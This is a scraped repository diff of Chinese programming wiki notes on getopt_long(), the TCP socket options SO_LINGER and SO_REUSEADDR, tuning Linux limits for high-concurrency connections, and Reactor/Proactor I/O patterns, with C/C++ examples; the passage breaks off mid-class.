对结构中的各元素解释如下:
|
||||
|
||||
const char *name
|
||||
|
||||
这是选项名,前面没有短横线。譬如"help"、"verbose"之类。
|
||||
int has_arg
|
||||
|
||||
描述了选项是否有选项参数。如果有,是哪种类型的参数,此时,它的值一定是下表中的一个。
|
||||
符号常量 数值 含义
|
||||
no_argument 0 选项没有参数
|
||||
required_argument 1 选项需要参数
|
||||
optional_argument 2 选项参数可选
|
||||
|
||||
int *flag
|
||||
如果这个指针为NULL,那么 getopt_long()返回该结构val字段中的数值。如果该指针不为NULL,getopt_long()会使得它所指向的变量中填入val字段中的数值,并且getopt_long()返回0。如果flag不是NULL,但未发现长选项,那么它所指向的变量的数值不变。
|
||||
|
||||
int val
|
||||
这个值是发现了长选项时的返回值,或者flag不 是NULL时载入*flag中的值。典型情况下,若flag不是NULL,那么val是个真/假值,譬如1或0;另一方面,如果flag是NULL,那么 val通常是字符常量,若长选项与短选项一致,那么该字符常量应该与optstring中出现的这个选项的参数相同。(getopt()函数返回的是短选项对应的单个字符,getopt_long()返回的是长选项指定的但个字符,若这两个字符一致的话,以前处理短选项的代码就可以getopt_long()中重用。)
|
||||
每个长选项在长选项表中都有一个单独条目,该条目里需要填入正确的数值。数组中最后的元素的值应该全是0。数组不需要排序,getopt_long()会进行线性搜索。但是,根据长名字来排序会使程序员读起来更容易。
|
||||
|
||||
以上所说的flag和val的用法看上去有点混乱,但它们很有实用价值,因此有必要搞透彻了。
|
||||
|
||||
大部分时候,程序员会根据getopt_long()发现的选项,在选项处理过程中要设置一些标记变量,譬如在使用getopt()时,经常做出如下的程序格式:
|
||||
|
||||
int do_name, do_gf_name, do_love; /*标记变量*/
|
||||
char *b_opt_arg;
|
||||
|
||||
while((c = getopt(argc, argv, ":ngl:")) != -1)
|
||||
{
|
||||
switch (c){
|
||||
case 'n':
|
||||
do_name = 1;
|
||||
case 'g':
|
||||
do_gf_name = 1;
|
||||
break;
|
||||
case 'l':
|
||||
b_opt_arg = optarg;
|
||||
……
|
||||
}
|
||||
}
|
||||
当flag不为NULL时,getopt_long*()会为你设置标记变量。也就是说上面的代码中,关于选项'n'、'l'的处理,只是设置一些 标记,如果flag不为NULL,时,getopt_long()可以自动为各选项所对应的标记变量设置标记,这样就能够将上面的switch语句中的两 种种情况减少到了一种。下面给出一个长选项表以及相应处理代码的例子。
|
||||
|
||||
清单5:
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <getopt.h>
|
||||
|
||||
int do_name, do_gf_name;
|
||||
char *l_opt_arg;
|
||||
|
||||
struct option longopts[] = {
|
||||
{ "name", no_argument, &do_name, 1 },
|
||||
{ "gf_name", no_argument, &do_gf_name, 1 },
|
||||
{ "love", required_argument, NULL, 'l' },
|
||||
{ 0, 0, 0, 0},
|
||||
};
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
int c;
|
||||
|
||||
while((c = getopt_long(argc, argv, ":l:", longopts, NULL)) != -1){ //optstring中只应包含struct option结构中有返回字符的选项,对于默认的数字0可以不包含。
|
||||
switch (c){
|
||||
case 'l':
|
||||
l_opt_arg = optarg;
|
||||
printf("Our love is %s!\n", l_opt_arg);
|
||||
break;
|
||||
case 0:
|
||||
printf("getopt_long()设置变量 : do_name = %d\n", do_name);
|
||||
printf("getopt_long()设置变量 : do_gf_name = %d\n", do_gf_name);
|
||||
break;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
在进行测试之前,再来回顾一下有关option结构中的指针flag的说明吧。
|
||||
|
||||
如果这个指针为NULL,那么 getopt_long()返回该结构val字段中的数值。如果该指针不为NULL,getopt_long()会使得它所指向的变量中填入val字段中 的数值,并且getopt_long()返回0。如果flag不是NULL,但未发现长选项,那么它所指向的变量的数值不变。
|
||||
下面测试一下:
|
||||
|
||||
$ ./long_opt_demo --name
|
||||
getopt_long()设置变量 : do_name = 1
|
||||
getopt_long()设置变量 : do_gf_name = 0
|
||||
|
||||
$ ./long_opt_demo --gf_name
|
||||
getopt_long()设置变量 : do_name = 0
|
||||
getopt_long()设置变量 : do_gf_name = 1
|
||||
|
||||
$ ./long_opt_demo --love forever
|
||||
Our love is forever!
|
||||
|
||||
$ ./long_opt_demo -l forever
|
||||
Our love is forever!
|
||||
|
||||
测试过后,应该有所感触了。关于flag和val的讨论到此为止。下面总结一下get_long()的各种返回值的含义:
|
||||
|
||||
返回值
|
||||
含 义
|
||||
0
|
||||
getopt_long()设置一个标志,它的值与option结构中的val字段的值一样,不应该自定义一个返回数字0的长选项。
|
||||
|
||||
1
|
||||
每碰到一个命令行参数,optarg都会记录它 。
|
||||
|
||||
'?'
|
||||
无效选项
|
||||
':'
|
||||
缺少选项参数
|
||||
'x'
|
||||
选项字符'x'
|
||||
-1
|
||||
选项解析结束
|
||||
|
||||
从实用的角度来说,我们更期望每个长选项都对应一个短选项,这种情况下,在option结构中,只要将flag设置为NULL,并将val设置为长选项所对应的短选项字符即可。譬如上面清单5中的程序,修改如下。
|
||||
|
||||
清单6:
|
||||
|
||||
#include <stdio.h>
|
||||
#include <getopt.h>
|
||||
|
||||
int do_name, do_gf_name;
|
||||
char *l_opt_arg;
|
||||
|
||||
struct option longopts[] = {
|
||||
{ "name", no_argument, NULL, 'n' },
|
||||
{ "gf_name", no_argument, NULL, 'g' },
|
||||
{ "love", required_argument, NULL, 'l' },
|
||||
{ 0, 0, 0, 0},
|
||||
};
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
{
|
||||
int c;
|
||||
|
||||
while((c = getopt_long(argc, argv, ":l:", longopts, NULL)) != -1){
|
||||
switch (c){
|
||||
case 'n':
|
||||
printf("My name is LYR.\n");
|
||||
break;
|
||||
case 'g':
|
||||
printf("Her name is BX.\n");
|
||||
break;
|
||||
case 'l':
|
||||
l_opt_arg = optarg;
|
||||
printf("Our love is %s!\n", l_opt_arg);
|
||||
break;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
测试结果如下:
|
||||
|
||||
$ ./long_opt_demo --name --gf_name --love forever
|
||||
My name is LYR.
|
||||
Her name is BX.
|
||||
Our love is forever!
|
||||
|
||||
$ ./long_opt_demo -ng -l forever
|
||||
My name is LYR.
|
||||
Her name is BX.
|
||||
Our love is forever!
|
||||
|
||||
9、在LINUX之外的系统平台上使用GNU getopt()或getopt_long()
|
||||
|
||||
只要从GNU程序或GNU C Library(GLIBC)的CVS档案文件中copy源文件即可(http://sourceware.org/glibc/)。所需源文件是 getopt.h、getopt.c和getoptl.c,将这些文件包含在你的项目中。另外,你的项目中最好也将COPYING.LIB文件包含进去, 因为GNU LGPL(GNU 程序库公共许可证)的内容全部包括在命名为COPYING.LIB 的文件中。
|
||||
10、结论
|
||||
|
||||
程序需要能够快速处理各个选项和参数,且要求 不会浪费开发人员的太多时间。在这一点上,无论是GUI(图形用户交互)程序还是CUI(命令行交互)程序,都是其首要任务,其区别仅在于实现方式的不 同。GUI通过菜单、对话框之类的图形控件来完成交互,而CUI使用了纯文本的交互方式。在程序开发中,许多测试程序用CUI来完成是首选方案。
|
||||
getopt() 函数是一个标准库调用,可允许您使用直接的 while/switch 语句方便地逐个处理命令行参数和检测选项(带或不带附加的参数)。与其类似的 getopt_long() 允许在几乎不进行额外工作的情况下处理更具描述性的长选项,这非常受开发人员的欢迎。
|
||||
|
||||
@@ -0,0 +1,93 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-03T21:35:23+08:00
|
||||
|
||||
====== Linux网络编程socket选项之SO LINGER,SO REUSEADDR ======
|
||||
Created 星期五 03 六月 2011
|
||||
|
||||
Linux网络编程中,socket的选项很多.其中几个比较重要的选项有:SO_LINGER(仅仅适用于TCP,SCTP), SO_REUSEADDR.
|
||||
|
||||
SO_LINGER
|
||||
|
||||
在默认情况下,当调用close关闭socke的使用,close会立即返回,但是,如果send buffer中还有数据,系统会试着先把send buffer中的数据发送出去,然后close才返回.
|
||||
|
||||
SO_LINGER选项则是用来修改这种默认操作的.于SO_LINGER相关联的一个结构体如下:
|
||||
|
||||
view plaincopy to clipboardprint?
|
||||
|
||||
#include <sys/socket.h>
|
||||
struct linger {
|
||||
int l_onoff //0=off, nonzero=on(开关)
|
||||
int l_linger //linger time(延迟时间)
|
||||
}
|
||||
|
||||
当调用setsockopt之后,该选项产生的影响取决于linger结构体中 l_onoff和l_linger的值:
|
||||
|
||||
0 = l_onoff
|
||||
|
||||
当l_onoff被设置为0的时候,将会关闭SO_LINGER选项,即TCP或则SCTP保持默认操作:close立即返回.l_linger值被忽略.
|
||||
|
||||
l_lineoff值非0,0 = l_linger
|
||||
|
||||
当调用close的时候,TCP连接会立即断开.send buffer中未被发送的数据将被丢弃,并向对方发送一个RST信息.值得注意的是,由于这种方式,是非正常的4中握手方式结束TCP链接,所以,TCP连接将不会进入TIME_WAIT状态,这样会导致新建立的可能和就连接的数据造成混乱。具体原因详见我的上一篇文章《linux 网络编程之TIME_WAIT状态》
|
||||
|
||||
l_onoff和l_linger都是非0
|
||||
|
||||
在这种情况下,回事的close返回得到延迟。调用close去关闭socket的时候,内核将会延迟。也就是说,如果send buffer中还有数据尚未发送,该进程将会被休眠直到一下任何一种情况发生:
|
||||
|
||||
1) send buffer中的所有数据都被发送并且得到对方TCP的应答消息(这种应答并不是意味着对方应用程序已经接收到数据,在后面shutdown将会具体讲道)
|
||||
2) 延迟时间消耗完。在延迟时间被消耗完之后,send buffer中的所有数据都将会被丢弃。
|
||||
|
||||
上面1),2)两种情况中,如果socket被设置为O_NONBLOCK状态,程序将不会等待close返回,send buffer中的所有数据都将会被丢弃。所以,需要我们判断close的返回值。在send buffer中的所有数据都被发送之前并且延迟时间没有消耗完,close返回的话,close将会返回一个EWOULDBLOCK的error.
|
||||
|
||||
下面用几个实例来说明:
|
||||
|
||||
|
||||
A. Close默认操作:立即返回
|
||||
{{./1.jpg}}
|
||||
|
||||
|
||||
此种情况,close立即返回,如果send buffer中还有数据,close将会等到所有数据被发送完之后之后返回。由于我们并没有等待对方TCP发送的ACK信息,所以我们只能保证数据已经发送到对方,我们并不知道对方是否已经接受了数据。由于此种情况,TCP连接终止是按照正常的4次握手方式,需要经过TIME_WAIT。
|
||||
|
||||
B. l_onoff非0,并且使之l_linger为一个整数
|
||||
|
||||
{{./2.jpg}}
|
||||
|
||||
在这种情况下,close会在接收到对方TCP的ACK信息之后才返回(l_linger消耗完之前)。但是这种ACK信息只能保证对方已经接收到数据,并不保证对方应用程序已经读取数据。
|
||||
|
||||
C. l_linger设置值太小
|
||||
|
||||
{{./3.jpg}}
|
||||
|
||||
这种情况,由于l_linger值太小,在send buffer中的数据都发送完之前,close就返回,此种情况终止TCP连接,更l_linger = 0类似,TCP连接终止不是按照正常的4步握手,所以,TCP连接不会进入TIME_WAIT状态,那么,client会向server发送一个RST信息.
|
||||
|
||||
D. Shutdown,等待应用程序读取数据
|
||||
|
||||
{{./4.jpg}}
|
||||
|
||||
同上面的B进行对比,调用shutdown后紧接着调用read,此时read会被阻塞,直到接收到对方的FIN,也就是说read是在server的应用程序调用close之后才返回的。当server应用程序读取到来自client的数据和FIN之后,server会进入一个叫CLOSE_WAIT,关于CLOSE_WAIT,详见我的博客《 Linux 网络编程 之 TCP状态转换》 。那么,如果server端要断开该TCP连接,需要server应用程序调用一次close,也就意味着向client发送FIN。这个时候,说明server端的应用程序已经读取到client发送的数据和FIN。read会在接收到server的FIN之后返回。所以,shutdown 可以确保server端应用程序已经读取数据了,而不仅仅是server已经接收到数据而已。
|
||||
|
||||
shutdown参数如下:
|
||||
|
||||
SHUT_RD:调用shutdown的一端receive buffer将被丢弃掉,无法接受数据,但是可以发送数据,send buffer的数据可以被发送出去
|
||||
|
||||
SHUT_WR:调用shutdown的一端无法发送数据,但是可以接受数据.该参数表示不能调用send.但是如果还有数据在send buffer中,这些数据还是会被继续发送出去的.
|
||||
|
||||
SO_REUSEADDR和SO_REUSEPORT
|
||||
|
||||
最近,看到CSDN的linux版块,有人提问,说为什么server程序重启之后,无法连接,需要过一段时间才能连接上.我想对于这个问题,有两种可能:一种可能就是该server一直停留在TIME_WAIT状态.这个时候,需要等待2MSL的时间才能重新连接上,具体细节原因请见我的另一篇文章《linux 网络编程之TIME_WAIT状态》
|
||||
|
||||
另一种可能就是SO_REUSEADDR参数设置问题.关于TIME_WAIT的我就不在这里重述了,这里我讲一讲SO_REUSEADDR.
|
||||
|
||||
SO_REUSEADDR允许一个server程序listen监听并bind到一个端口,既是这个端口已经被一个正在运行的连接使用了.
|
||||
|
||||
我们一般会在下面这种情况中遇到:
|
||||
|
||||
一个监听(listen)server已经启动
|
||||
当有client有连接请求的时候,server产生一个子进程去处理该client的事物.
|
||||
server主进程终止了,但是子进程还在占用该连接处理client的事情.虽然子进程终止了,但是由于子进程没有终止,该socket的引用计数不会为0,所以该socket不会被关闭.
|
||||
server程序重启.
|
||||
|
||||
默认情况下,server重启,调用socket,bind,然后listen,会失败.因为该端口正在被使用.如果设定SO_REUSEADDR,那么server重启才会成功.因此,所有的TCP server都必须设定此选项,用以应对server重启的现象.
|
||||
|
||||
SO_REUSEADDR允许同一个端口上绑定多个IP.只要这些IP不同.另外,还可以在绑定IP通配符.但是最好是先绑定确定的IP,最后绑定通配符IP.一面系统拒绝.简而言之,SO_REUSEADDR允许多个server绑定到同一个port上,只要这些server指定的IP不同,但是SO_REUSEADDR需要在bind调用之前就设定.在TCP中,不允许建立起一个已经存在的相同的IP和端口的连接.但是在UDP中,是允许的.
|
||||
|
After Width: | Height: | Size: 12 KiB |
|
After Width: | Height: | Size: 12 KiB |
|
After Width: | Height: | Size: 11 KiB |
|
After Width: | Height: | Size: 12 KiB |
63
Zim/Programme/APUE/Linux配置支持高并发TCP连接(socket最大连接数).txt
Normal file
@@ -0,0 +1,63 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-08-06T20:20:11+08:00
|
||||
|
||||
====== Linux配置支持高并发TCP连接(socket最大连接数) ======
|
||||
Created Saturday 06 August 2011
|
||||
|
||||
===== 1、修改用户进程可打开文件数限制 =====
|
||||
在Linux平台上,无论编写客户端程序还是服务端程序,在进行高并发TCP连接处理时,最高的并发数量都要受到系统对__用户单一进程同时可打开文件数量的限制__(这是因为系统为每个TCP连接都要创建一个socket句柄,每个socket句柄同时也是一个文件句柄)。可使用ulimit命令查看系统允许当前用户进程打开的文件数限制:
|
||||
[speng@as4 ~]$ ulimit -n
|
||||
1024
|
||||
这表示当前用户的每个进程最多允许同时打开1024个文件,这1024个文件中还得除去每个进程必然打开的标准输入,标准输出,标准错误,服务器监听 socket,进程间通讯的unix域socket等文件,那么剩下的可用于客户端socket连接的文件数就只有大概1024-10=1014个左右。也就是说缺省情况下,基于Linux的通讯程序最多允许同时1014个TCP并发连接。
|
||||
对于想支持更高数量的TCP并发连接的通讯处理程序,就必须修改Linux对当前用户的进程同时打开的文件数量的软限制(soft limit)和硬限制(hardlimit)。其中软限制是指Linux在当前系统能够承受的范围内进一步限制用户同时打开的文件数;硬限制则是根据系统硬件资源状况(主要是系统内存)计算出来的系统最多可同时打开的文件数量。通常软限制小于或等于硬限制。
|
||||
修改上述限制的最简单的办法就是使用ulimit命令:
|
||||
[speng@as4 ~]$ ulimit -n
|
||||
上述命令中,在中指定要设置的单一进程允许打开的最大文件数。如果系统回显类似于“Operation notpermitted”之类的话,说明上述限制修改失败,实际上是因为在中指定的数值超过了Linux系统对该用户打开文件数的软限制或硬限制。因此,就需要修改Linux系统对用户的关于打开文件数的软限制和硬限制。
|
||||
第一步,修改/etc/security/limits.conf文件,在文件中添加如下行:
|
||||
speng soft nofile 10240
|
||||
speng hard nofile 10240
|
||||
其中speng指定了要修改哪个用户的打开文件数限制,可用'*'号表示修改所有用户的限制;soft或hard指定要修改软限制还是硬限制;10240则指定了想要修改的新的限制值,即最大打开文件数(请注意软限制值要小于或等于硬限制)。修改完后保存文件。
|
||||
第二步,修改/etc/pam.d/login文件,在文件中添加如下行:
|
||||
session required /lib/security/pam_limits.so
|
||||
这是告诉Linux在用户完成系统登录后,应该调用pam_limits.so模块来设置系统对该用户可使用的各种资源数量的最大限制(包括用户可打开的最大文件数限制),而pam_limits.so模块就会从/etc/security/limits.conf文件中读取配置来设置这些限制值。修改完后保存此文件。
|
||||
第三步,__查看Linux系统级的最大打开文件数限制__,使用如下命令:
|
||||
[speng@as4 ~]$ cat /proc/sys/fs/file-max
|
||||
12158
|
||||
这表明这台Linux系统最多允许同时打开(即包含所有用户打开文件数总和)12158个文件,是Linux系统级硬限制,所有用户级的打开文件数限制都不应超过这个数值。通常这个系统级硬限制是Linux系统在启动时根据系统硬件资源状况计算出来的最佳的最大同时打开文件数限制,如果没有特殊需要,不应该修改此限制,除非想为用户级打开文件数限制设置超过此限制的值。修改此硬限制的方法是修改/etc/rc.local脚本,在脚本中添加如下行:
|
||||
echo 22158 > /proc/sys/fs/file-max
|
||||
这是让Linux在启动完成后强行将系统级打开文件数硬限制设置为22158。修改完后保存此文件。
|
||||
完成上述步骤后重启系统,一般情况下就可以将Linux系统对指定用户的单一进程允许同时打开的最大文件数限制设为指定的数值。如果重启后用 ulimit-n命令查看用户可打开文件数限制仍然低于上述步骤中设置的最大值,这可能是因为在用户登录脚本/etc/profile中使用ulimit -n命令已经将用户可同时打开的文件数做了限制。由于通过ulimit-n修改系统对用户可同时打开文件的最大数限制时,新修改的值只能小于或等于上次 ulimit-n设置的值,因此想用此命令增大这个限制值是不可能的。所以,如果有上述问题存在,就只能去打开/etc/profile脚本文件,在文件中查找是否使用了ulimit-n限制了用户可同时打开的最大文件数量,如果找到,则删除这行命令,或者将其设置的值改为合适的值,然后保存文件,用户退出并重新登录系统即可。
|
||||
通过上述步骤,就为支持高并发TCP连接处理的通讯处理程序解除关于打开文件数量方面的系统限制。
|
||||
|
||||
|
||||
===== 2、修改网络内核对TCP连接的有关限制(参考对比下篇文章“优化内核参数”) =====
|
||||
在Linux上编写支持高并发TCP连接的客户端通讯处理程序时,有时会发现尽管已经解除了系统对用户同时打开文件数的限制,但仍会出现并发TCP连接数增加到一定数量时,再也无法成功建立新的TCP连接的现象。出现这种现在的原因有多种。
|
||||
|
||||
==== 第一种原因可能是因为Linux网络内核对本地端口号范围有限制。 ====
|
||||
此时,进一步分析为什么无法建立TCP连接,会发现问题出在connect()调用返回失败,查看系统错误提示消息是“Can't assign requestedaddress”。同时,如果在此时用tcpdump工具监视网络,会发现根本没有TCP连接时客户端发SYN包的网络流量。这些情况说明问题在于本地Linux系统内核中有限制。其实,问题的根本原因在于Linux内核的TCP/IP协议实现模块对系统中所**有的**__客户端__**TCP连接对应的本地端口号的范围进行了限制**(例如,内核限制本地端口号的范围为1024~32768之间)。当系统中某一时刻同时存在太多的TCP客户端连接时,由于每个TCP客户端连接都要占用一个唯一的本地端口号(此端口号在系统的本地端口号范围限制中),如果现有的TCP客户端连接已将所有的本地端口号占满,则此时就无法为新的TCP客户端连接分配一个本地端口号了,因此系统会在这种情况下在connect()调用中返回失败,并将错误提示消息设为“Can't assignrequested address”。有关这些控制逻辑可以查看Linux内核源代码,以linux2.6内核为例,可以查看tcp_ipv4.c文件中如下函数:
|
||||
static int tcp_v4_hash_connect(struct sock *sk)
|
||||
请注意上述函数中对变量__sysctl_local_port_range__的访问控制。变量sysctl_local_port_range的初始化则是在tcp.c文件中的如下函数中设置:
|
||||
void __init tcp_init(void)
|
||||
内核编译时默认设置的本地端口号范围可能太小,因此需要修改此本地端口范围限制。
|
||||
第一步,修改/etc/sysctl.conf文件,在文件中添加如下行:
|
||||
net.ipv4.ip_local_port_range = 1024 65000
|
||||
这表明将系统对本地端口范围限制设置为1024~65000之间。请注意,本地端口范围的最小值必须大于或等于1024;而端口范围的最大值则应小于或等于65535。修改完后保存此文件。
|
||||
第二步,执行sysctl命令:
|
||||
[speng@as4 ~]$ sysctl -p
|
||||
如果系统没有错误提示,就表明新的本地端口范围设置成功。如果按上述端口范围进行设置,则理论上单独一个进程最多可以同时建立60000多个TCP客户端连接。
|
||||
|
||||
===== 第二种无法建立TCP连接的原因可能是因为Linux网络内核的IP_TABLE防火墙对最大跟踪的TCP连接数有限制。 =====
|
||||
此时程序会表现为在 connect()调用中阻塞,如同死机,如果用tcpdump工具监视网络,也会发现根本没有TCP连接时客户端发SYN包的网络流量。由于 IP_TABLE防火墙在内核中会**对每个TCP连接的状态进行跟踪**,跟踪信息将会放在位于内核内存中的conntrackdatabase中,这个数据库的大小有限,当系统中存在过多的TCP连接时,数据库容量不足,IP_TABLE无法为新的TCP连接建立跟踪信息,于是表现为在connect()调用中阻塞。此时就必须修改内核对最大跟踪的TCP连接数的限制,方法同修改内核对本地端口号范围的限制是类似的:
|
||||
第一步,修改/etc/sysctl.conf文件,在文件中添加如下行:
|
||||
__net.ipv4.ip_conntrack_max__ = 10240
|
||||
这表明将系统对最大跟踪的TCP连接数限制设置为10240。请注意,此限制值要尽量小,以节省对内核内存的占用。
|
||||
第二步,执行sysctl命令:
|
||||
[speng@as4 ~]$ sysctl -p
|
||||
如果系统没有错误提示,就表明系统对新的最大跟踪的TCP连接数限制修改成功。如果按上述参数进行设置,则理论上单独一个进程最多可以同时建立10000多个TCP客户端连接。
|
||||
|
||||
===== 3、使用支持高并发网络I/O的编程技术 =====
|
||||
在Linux上编写高并发TCP连接应用程序时,必须使用合适的网络I/O技术和I/O事件分派机制。
|
||||
可用的I/O技术有同步I/O,非阻塞式同步I/O(也称反应式I/O),以及异步I/O。在高TCP并发的情形下,如果使用同步I/O,这会严重阻塞程序的运转,除非为每个TCP连接的I/O创建一个线程。但是,过多的线程又会因系统对线程的调度造成巨大开销。因此,**在高TCP并发的情形下使用同步 I/O是不可取的**,这时可以考虑使用非阻塞式同步I/O或异步I/O。非阻塞式同步I/O的技术包括使用select(),poll(),epoll等机制。异步I/O的技术就是使用AIO。
|
||||
从I/O事件分派机制来看,**使用select()是不合适的**,因为它所支持的并发连接数有限(通常在1024个以内)。如果考虑性能,poll()也是不合适的,尽管它可以支持的较高的TCP并发数,但是由于其采用“轮询”机制,当并发数较高时,其运行效率相当低,并可能存在I/O事件分派不均,导致部分TCP连接上的I/O出现“饥饿”现象。而如果使用epoll或AIO,则没有上述问题(早期Linux内核的AIO技术实现是通过在内核中为每个 I/O请求创建一个线程来实现的,这种实现机制在高并发TCP连接的情形下使用其实也有严重的性能问题。但在最新的Linux内核中,AIO的实现已经得到改进)。
|
||||
综上所述,在开发支持高并发TCP连接的Linux应用程序时,__应尽量使用epoll或AIO__技术来实现并发的TCP连接上的I/O控制,这将为提升程序对高并发TCP连接的支持提供有效的I/O保证。
|
||||
@@ -0,0 +1,21 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-08-06T20:26:48+08:00
|
||||
|
||||
====== 单个服务器程序可承受最大连接数“理论”上是“65535” ======
|
||||
Created Saturday 06 August 2011
|
||||
|
||||
一个误解: 单个服务器程序可承受最大连接数“理论”上是“65535”
|
||||
请注意,这里有两个词分别被我标记上了引号,一个是“理论”,一个是“65535”。强调“理论”这个词,是想特别明确误解者的意思:就是说,这个值是不可能被打破的,是铁板钉丁的。而65535这个数字的由来,很多人想当然地将它与port最大值联系起来。的确,TCP的端口数,最大值确实为65535。但是,这并不代表一个服务器可以接受的连接数就是这个值,很多人之所以把这两个概念搞混淆是因为对socket和port没有更深的认识和理解。我们先来回想一下服务器服务的先后过程:服务器创建监听socket- >与对外服务的端口号绑定->开始listen->客户端连接到服务器对应的port->服务器accept为新的客户端产生新的socket->基于这个新的socket与客户端交换数据。从以上流程来看,最大值为65535的“端口号”这个重要的东东,我们只用了一次,就是执行bind的时候!而以后创建的socket,说白了就是一个可以进行网络IO操作的HANDLE而已,它跟端口号的牵扯仅限bind以及作为客户端连接服务器的识别端口号的时候,一旦accept产生了socket,这个端口号,对服务器和新客户端的通信而言就不再有任何意义。而服务器可承载的连接数最大量,不就是能产生多少个客户端的socket吗?这个socket值即使与端口号无关,又何来65535的“理论”上限?我再一次地将“理论”二字用引号括起,是因为在有的操作系统中,默认的配置会将socket最大值设定为65535,但这个值是可以改的!
|
||||
[/quote]
|
||||
端口号仅仅是门牌地址,不能因为鸟巢体育场能容纳10万名观众就搞10万个门牌号码吧,那电话簿要多厚啊:mrgreen:
|
||||
要搞也搞的是10万个座位号:em17:
|
||||
|
||||
一下是各种io模型的大概性能比较。
|
||||
I/O 模型 尝试数/连接成功数
|
||||
block: 7000/1008
|
||||
noBlock: 7000/4011
|
||||
WSAAsyncSelect: 7000/1956
|
||||
WSAEventSelect: 7000/6999
|
||||
Overlapped: 7000/5558
|
||||
completion port: 7000/7000, 50000/4997
|
||||
197
Zim/Programme/APUE/Proactor和Reactor模式.txt
Normal file
@@ -0,0 +1,197 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-17T11:15:37+08:00
|
||||
|
||||
====== Proactor和Reactor模式 ======
|
||||
Created Friday 17 February 2012
|
||||
http://www.cppblog.com/kevinlynx/archive/2008/06/06/52356.html
|
||||
|
||||
Kevin Lynx
|
||||
|
||||
Proactor和Reactor都是并发编程中的设计模式。在我看来,他们都是__用于派发/分离IO操作事件__的。这里所谓的
|
||||
IO事件也就是__诸如read/write的IO操作__。"派发/分离"就是__将单独的IO事件通知到上层模块__。两个模式不同的地方
|
||||
在于,**Proactor用于异步IO,而Reactor用于同步IO**。
|
||||
|
||||
摘抄一些关键的东西:
|
||||
|
||||
"
|
||||
Two patterns that involve **event demultiplexors** are called Reactor and Proactor [1]. The Reactor patterns
|
||||
involve synchronous I/O, whereas the Proactor pattern involves asynchronous I/O.
|
||||
"
|
||||
|
||||
关于两个模式的大致模型,从以下文字基本可以明白:
|
||||
|
||||
"
|
||||
An example will help you understand the difference between Reactor and Proactor. We will focus on the read
|
||||
operation here, as the write implementation is similar. Here's a read in Reactor:
|
||||
|
||||
* An __event handler__ declares interest in I/O events that indicate readiness for read on a particular socket ;
|
||||
* The __event demultiplexor__ waits for events ;
|
||||
* An event comes in and** wakes-up the demultiplexor**, and the demultiplexor calls the appropriate handler;
|
||||
* The event handler performs t__he actual read operation__, handles the data read, declares** renewed interest** in
|
||||
I/O events, and returns control to the dispatcher .
|
||||
|
||||
By comparison, here is a read operation in Proactor (true async):
|
||||
|
||||
* A __handler__ initiates an asynchronous read operation (note: the OS must support asynchronous I/O). In this
|
||||
case, the handler does not care about I/O readiness events, but is instead registers interest in **receiving**
|
||||
** completion events**;
|
||||
* The __event demultiplexor__ waits until the operation is completed ;
|
||||
* While the event demultiplexor waits, the OS executes the read operation in** a parallel kernel thread**, puts
|
||||
data into** a user-defined buffer**, and notifies the event demultiplexor that the read is complete ;
|
||||
* The event demultiplexor __calls__ the appropriate handler;
|
||||
* The event handler handles the data from user defined buffer, starts **a new asynchronous operation**, and returns
|
||||
control to the event demultiplexor.
|
||||
|
||||
"
|
||||
|
||||
可以看出,两个模式的相同点,都是对某个IO事件的事件通知(即告诉某个模块,这个IO操作可以进行或已经完成)。在结构
|
||||
上,两者也有__相同点__:demultiplexor负责提交IO操作(异步)、查询设备是否可操作(同步),然后当条件满足时,就回调handler。
|
||||
__不同点__在于,异步情况下(Proactor),当回调handler时,表示IO操作已经完成;同步情况下(Reactor),回调handler时,表示
|
||||
IO设备可以进行某个操作(can read or can write),handler这个时候开始提交操作。
|
||||
|
||||
用**select模型**写个简单的reactor,大致为:
|
||||
|
||||
///
|
||||
class __handler__
|
||||
{
|
||||
public:
|
||||
virtual void onRead() = 0;
|
||||
virtual void onWrite() = 0;
|
||||
virtual void onAccept() = 0;
|
||||
};
|
||||
|
||||
class __dispatch__
|
||||
{
|
||||
public:
|
||||
void poll()
|
||||
{
|
||||
// add fd in the set.
|
||||
//
|
||||
// poll every fd
|
||||
int c = select( 0, &read_fd, &write_fd, 0, 0 );
|
||||
if( c > 0 )
|
||||
{
|
||||
for each fd in the read_fd_set
|
||||
{ if fd can read
|
||||
_handler->onRead();
|
||||
if fd can accept
|
||||
_handler->onAccept();
|
||||
}
|
||||
|
||||
for each fd in the write_fd_set
|
||||
{
|
||||
if fd can write
|
||||
_handler->onWrite();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
void setHandler( handler *_h )
|
||||
{
|
||||
_handler = _h;
|
||||
}
|
||||
|
||||
private:
|
||||
**handler** *_handler;
|
||||
};
|
||||
|
||||
/// application
|
||||
class MyHandler : public handler
|
||||
{
|
||||
public:
|
||||
void onRead()
|
||||
{
|
||||
}
|
||||
|
||||
void onWrite()
|
||||
{
|
||||
}
|
||||
|
||||
void onAccept()
|
||||
{
|
||||
}
|
||||
};
|
||||
|
||||
|
||||
在网上找了份Proactor模式比较正式的文档,其给出了一个总体的UML类图,比较全面:
|
||||
|
||||
{{./proactor_uml_thumb.jpg}}
|
||||
|
||||
根据这份图我随便写了个例子代码:
|
||||
|
||||
class AsyIOProcessor
|
||||
{
|
||||
public:
|
||||
void do_read()
|
||||
{
|
||||
//send read operation to OS
|
||||
// read io finished.and dispatch notification
|
||||
_proactor->dispatch_read();
|
||||
}
|
||||
|
||||
private:
|
||||
__Proactor*__ _proactor;
|
||||
};
|
||||
|
||||
class Proactor
|
||||
{
|
||||
public:
|
||||
void dispatch_read()
|
||||
{
|
||||
_handlerMgr->onRead();
|
||||
}
|
||||
|
||||
private:
|
||||
HandlerManager *_handlerMgr;
|
||||
};
|
||||
|
||||
class HandlerManager
|
||||
{
|
||||
public:
|
||||
typedef __std::list<Handler*>__ HandlerList;
|
||||
|
||||
public:
|
||||
void onRead()
|
||||
{
|
